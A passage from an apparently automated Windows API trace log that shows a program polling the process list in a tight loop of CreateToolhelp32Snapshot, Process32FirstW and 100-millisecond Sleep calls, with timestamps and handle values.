CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbe4 [0292.921] Process32FirstW (in: hSnapshot=0xbe4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.927] Sleep (dwMilliseconds=0x64) [0293.029] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbe8 [0293.031] Process32FirstW (in: hSnapshot=0xbe8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.037] Sleep (dwMilliseconds=0x64) [0293.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbec [0293.140] Process32FirstW (in: hSnapshot=0xbec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.146] Sleep (dwMilliseconds=0x64) [0293.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbf0 [0293.251] Process32FirstW (in: hSnapshot=0xbf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.256] Sleep (dwMilliseconds=0x64) [0293.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbf4 [0293.358] Process32FirstW (in: hSnapshot=0xbf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.364] Sleep (dwMilliseconds=0x64) [0293.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbf8 [0293.468] Process32FirstW (in: hSnapshot=0xbf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.473] Sleep (dwMilliseconds=0x64) [0293.577] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xbfc [0293.579] Process32FirstW (in: hSnapshot=0xbfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.584] Sleep (dwMilliseconds=0x64) [0293.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc04 [0293.686] Process32FirstW (in: hSnapshot=0xc04, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.692] Sleep (dwMilliseconds=0x64) [0293.794] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc08 [0293.795] Process32FirstW (in: hSnapshot=0xc08, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.801] Sleep (dwMilliseconds=0x64) [0293.903] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc0c [0293.905] Process32FirstW (in: hSnapshot=0xc0c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.911] Sleep (dwMilliseconds=0x64) [0294.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc10 [0294.014] Process32FirstW (in: hSnapshot=0xc10, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.020] Sleep (dwMilliseconds=0x64) [0294.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc14 [0294.123] Process32FirstW (in: hSnapshot=0xc14, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.129] Sleep (dwMilliseconds=0x64) [0294.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc18 [0294.232] Process32FirstW (in: hSnapshot=0xc18, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.238] Sleep (dwMilliseconds=0x64) [0294.340] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc1c [0294.342] Process32FirstW (in: hSnapshot=0xc1c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.348] Sleep (dwMilliseconds=0x64) [0294.449] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc20 [0294.451] Process32FirstW (in: hSnapshot=0xc20, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.457] Sleep (dwMilliseconds=0x64) [0294.558] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc24 [0294.560] Process32FirstW (in: hSnapshot=0xc24, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.565] Sleep (dwMilliseconds=0x64) [0294.669] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc28 [0294.671] Process32FirstW (in: hSnapshot=0xc28, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.676] Sleep (dwMilliseconds=0x64) [0294.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc2c [0294.778] Process32FirstW (in: hSnapshot=0xc2c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.784] Sleep (dwMilliseconds=0x64) [0294.886] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc30 [0294.887] Process32FirstW (in: hSnapshot=0xc30, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.893] Sleep (dwMilliseconds=0x64) [0294.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc34 [0294.996] Process32FirstW (in: hSnapshot=0xc34, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.002] Sleep (dwMilliseconds=0x64) [0295.105] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc38 [0295.106] Process32FirstW (in: hSnapshot=0xc38, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.112] Sleep (dwMilliseconds=0x64) [0295.214] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc3c [0295.215] Process32FirstW (in: hSnapshot=0xc3c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.221] Sleep (dwMilliseconds=0x64) [0295.323] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc40 [0295.324] Process32FirstW (in: hSnapshot=0xc40, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.330] Sleep (dwMilliseconds=0x64) [0295.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc44 [0295.433] Process32FirstW (in: hSnapshot=0xc44, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.439] Sleep (dwMilliseconds=0x64) [0295.566] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc48 [0295.582] Process32FirstW (in: hSnapshot=0xc48, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.587] Sleep (dwMilliseconds=0x64) [0295.686] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc4c [0295.687] Process32FirstW (in: hSnapshot=0xc4c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.693] Sleep (dwMilliseconds=0x64) [0295.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc50 [0295.794] Process32FirstW (in: hSnapshot=0xc50, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.799] Sleep (dwMilliseconds=0x64) [0295.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc54 [0295.901] Process32FirstW (in: hSnapshot=0xc54, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.907] Sleep (dwMilliseconds=0x64) [0296.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc58 [0296.010] Process32FirstW (in: hSnapshot=0xc58, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.016] Sleep (dwMilliseconds=0x64) [0296.118] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc5c [0296.119] Process32FirstW (in: hSnapshot=0xc5c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.125] Sleep (dwMilliseconds=0x64) [0296.227] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc60 [0296.228] Process32FirstW (in: hSnapshot=0xc60, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.234] Sleep (dwMilliseconds=0x64) [0296.336] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc64 [0296.338] Process32FirstW (in: hSnapshot=0xc64, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.344] Sleep (dwMilliseconds=0x64) [0296.446] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc68 [0296.447] Process32FirstW (in: hSnapshot=0xc68, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.453] Sleep (dwMilliseconds=0x64) [0296.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc6c [0296.556] Process32FirstW (in: hSnapshot=0xc6c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.569] Sleep (dwMilliseconds=0x64) [0296.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc70 [0296.666] Process32FirstW (in: hSnapshot=0xc70, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.672] Sleep (dwMilliseconds=0x64) [0296.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc74 [0296.775] Process32FirstW (in: hSnapshot=0xc74, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.781] Sleep (dwMilliseconds=0x64) [0296.882] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc78 [0296.884] Process32FirstW (in: hSnapshot=0xc78, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.889] Sleep (dwMilliseconds=0x64) [0296.992] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc7c [0296.993] Process32FirstW (in: hSnapshot=0xc7c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.999] Sleep (dwMilliseconds=0x64) [0297.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc80 [0297.103] Process32FirstW (in: hSnapshot=0xc80, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.108] Sleep (dwMilliseconds=0x64) [0297.210] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc84 [0297.212] Process32FirstW (in: hSnapshot=0xc84, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.217] Sleep (dwMilliseconds=0x64) [0297.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc88 [0297.321] Process32FirstW (in: hSnapshot=0xc88, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.327] Sleep (dwMilliseconds=0x64) [0297.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc8c [0297.430] Process32FirstW (in: hSnapshot=0xc8c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.435] Sleep (dwMilliseconds=0x64) [0297.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc90 [0297.539] Process32FirstW (in: hSnapshot=0xc90, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.545] Sleep (dwMilliseconds=0x64) [0297.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc94 [0297.648] Process32FirstW (in: hSnapshot=0xc94, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.654] Sleep (dwMilliseconds=0x64) [0297.756] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc98 [0297.758] Process32FirstW (in: hSnapshot=0xc98, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.763] Sleep (dwMilliseconds=0x64) [0297.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc9c [0297.876] Process32FirstW (in: hSnapshot=0xc9c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.882] Sleep (dwMilliseconds=0x64) [0297.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xca0 [0297.992] Process32FirstW (in: hSnapshot=0xca0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.997] Sleep (dwMilliseconds=0x64) [0298.100] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xca4 [0298.101] Process32FirstW (in: hSnapshot=0xca4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.107] Sleep (dwMilliseconds=0x64) [0298.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xca8 [0298.210] Process32FirstW (in: hSnapshot=0xca8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.216] Sleep (dwMilliseconds=0x64) [0298.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcac [0298.326] Process32FirstW (in: hSnapshot=0xcac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.331] Sleep (dwMilliseconds=0x64) [0298.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcb0 [0298.428] Process32FirstW (in: hSnapshot=0xcb0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.434] Sleep (dwMilliseconds=0x64) [0298.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcb4 [0298.538] Process32FirstW (in: hSnapshot=0xcb4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.543] Sleep (dwMilliseconds=0x64) [0298.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcb8 [0298.647] Process32FirstW (in: hSnapshot=0xcb8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.652] Sleep (dwMilliseconds=0x64) [0298.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcbc [0298.756] Process32FirstW (in: hSnapshot=0xcbc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.762] Sleep (dwMilliseconds=0x64) [0298.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc0 [0298.865] Process32FirstW (in: hSnapshot=0xcc0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.871] Sleep (dwMilliseconds=0x64) [0298.973] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc4 [0298.975] Process32FirstW (in: hSnapshot=0xcc4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.982] Sleep (dwMilliseconds=0x64) [0299.089] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcc8 [0299.091] Process32FirstW (in: hSnapshot=0xcc8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.097] Sleep (dwMilliseconds=0x64) [0299.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xccc [0299.209] Process32FirstW (in: hSnapshot=0xccc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.216] Sleep (dwMilliseconds=0x64) [0299.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcd0 [0299.320] Process32FirstW (in: hSnapshot=0xcd0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.327] Sleep (dwMilliseconds=0x64) [0299.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 